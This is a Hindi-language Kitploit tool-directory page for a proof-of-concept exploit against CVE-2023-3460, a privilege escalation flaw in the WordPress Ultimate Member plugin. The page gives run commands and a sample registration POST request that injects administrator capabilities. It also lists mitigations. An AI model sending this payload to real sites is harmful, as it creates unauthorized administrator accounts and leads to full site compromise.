Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-3460 — CVE-2023-3460 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक WordPress Ultimate Member विशेषाधिकार वृद्धि भेद्यता। क्राफ्टेड रजिस्ट्रेशन अनुरोध के माध्यम से एक एडमिन खाता बनाता है। केवल अधिकृत परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/gurjotexpert/cve-2023-3460
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

CVE-2023-3460 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक WordPress Ultimate Member विशेषाधिकार वृद्धि भेद्यता। क्राफ्टेड रजिस्ट्रेशन अनुरोध के माध्यम से एक एडमिन खाता बनाता है। केवल अधिकृत परीक्षण के लिए।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2023-3460 - WordPress Ultimate Member विशेषाधिकार वृद्धि शोषण

यह CVE-2023-3460 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो वर्डप्रेस प्लगइन Ultimate Member में एक महत्वपूर्ण कमजोरी है। यह अप्रमाणित उपयोगकर्ताओं को एक दुर्भावनापूर्ण पंजीकरण अनुरोध बनाकर उनके विशेषाधिकारों को प्रशासक तक बढ़ाने की अनुमति देता है।

🔥 प्रभाव: अनधिकृत व्यवस्थापक खाता निर्माण के माध्यम से पूरी साइट से समझौता।


📌 कमजोरी विवरण

  • प्रभावित प्लगइन: Ultimate Member
  • प्रभावित संस्करण: ≤ 2.6.6
  • फिक्स संस्करण: 2.6.7
  • शोषण प्रकार: पंजीकरण दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि
  • प्रमाणीकरण आवश्यक: ❌ नहीं
  • CVE: CVE-2023-3460

⚙️ आवश्यकताएँ

  • Python 3
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी
  • beautifulsoup4 लाइब्रेरी

आवश्यकताएँ स्थापित करें:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 शोषण उपयोग

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ उदाहरण:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 शोषण स्क्रिप्ट सुविधाएँ

  • पंजीकरण पृष्ठ से CSRF नॉन्स (_wpnonce) प्राप्त करता है
  • फॉर्म सत्यापन को बायपास करता है
  • wp_capabilities को administrator भूमिका के साथ इंजेक्ट करता है
  • बिना प्रमाणीकरण के एक नया एडमिन उपयोगकर्ता बनाता है

🔐 नमूना शोषण पेलोड

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ शमन

  • Ultimate Member प्लगइन को v2.6.7 या उससे ऊपर अपडेट करें
  • यदि आवश्यक न हो तो खुला पंजीकरण अक्षम करें
  • संदिग्ध गतिविधि के लिए उपयोगकर्ता निर्माण लॉग की निगरानी करें

📚 संदर्भ

  • 🔗 Patchstack Advisory
  • 🔗 CVE-2023-3460 on NVD

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान की गई है। सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनका परीक्षण करने की अनुमति है।


👨‍💻 लेखक

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
टूल डाउनलोड करें